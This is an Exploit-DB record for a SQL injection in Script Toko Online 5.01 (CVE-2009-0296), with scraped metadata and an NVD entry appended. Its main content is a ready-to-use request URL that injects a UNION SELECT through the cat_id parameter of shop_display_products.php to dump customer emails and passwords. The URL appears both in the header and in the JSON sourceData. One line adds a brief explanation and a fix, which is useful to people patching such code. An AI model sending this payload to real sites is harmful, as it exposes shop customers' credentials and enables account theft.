ID EDB-ID:7873
Type exploitdb
Reporter k1n9k0ng
Modified 2009-01-26T00:00:00
Description
Script Toko Online 5.01 (shop_display_products.php) SQL injection vulnerability via the cat_id parameter. CVE-2009-0296. Webapps exploit for the PHP platform.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts : Script Toko Online Vs.5.01
Scripts site : http://www.gempar.com/
Discovered By : k1n9k0ng
My Site : http://www.sekuritionline.net
IRC Channel : #sekuritionline
Special To : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Demo Site :
http://www.gempar.com/demotoko/
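Bug Found (the cat_id parameter reaches the SQL query unsanitized, so the request below can append a UNION SELECT that reads email and password from the customer table; the fix is to validate cat_id as an integer and bind it in a parameterized query):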
http://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*
# milw0rm.com [2009-01-26]
{"id": "EDB-ID:7873", "hash": "8a49da8dc230a9a2de23a12a0d56646d", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Script Toko Online 5.01 shop_display_products.php SQL Injection Vuln", "description": "Script Toko Online 5.01 (shop_display_products.php) SQL Injection Vuln. CVE-2009-0296. Webapps exploit for php platform", "published": "2009-01-26T00:00:00", "modified": "2009-01-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7873/", "reporter": "k1n9k0ng", "references": [], "cvelist": ["CVE-2009-0296"], "lastseen": "2016-02-01T03:15:17", "history": [], "viewCount": 8, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2016-02-01T03:15:17"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0296"]}], "modified": "2016-02-01T03:15:17"}, "vulnersScore": 6.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7873/", "sourceData": "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\nScripts : Script Toko Online Vs.5.01\nScripts site : http://www.gempar.com/\nDiscovered By : k1n9k0ng\nMy Site : http://www.sekuritionline.net\nIRC Channel : #sekuritionline\nSpecial To : adhietslank, cyberlog, cah_gemblunkz, jayoes, thesims, setiawan, fl3xu5, k1tk4t\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\nDemo Site :\nhttp://www.gempar.com/demotoko/\n\nBug Found:\nhttp://www.gempar.com/demotoko/shop_display_products.php?cat_id=-1 union select concat(email,0x3a,password),1,2,3,4,5,6,7 from naxtor_cart_store_customer/*\n\n# milw0rm.com [2009-01-26]\n", "osvdbidlist": ["51630"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in shop_display_products.php in Script Toko Online 5.01 allows remote attackers to execute arbitrary SQL commands via the cat_id parameter.", "modified": "2017-09-29T01:33:00", "id": "CVE-2009-0296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0296", "published": "2009-01-27T20:30:00", "title": "CVE-2009-0296", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}